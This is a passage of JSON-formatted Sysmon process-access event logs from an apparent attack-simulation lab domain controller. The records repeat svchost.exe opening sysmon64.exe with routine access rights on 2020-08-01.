2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7888,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7889,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7890,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7891,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7892,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7893,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7894,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7895,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 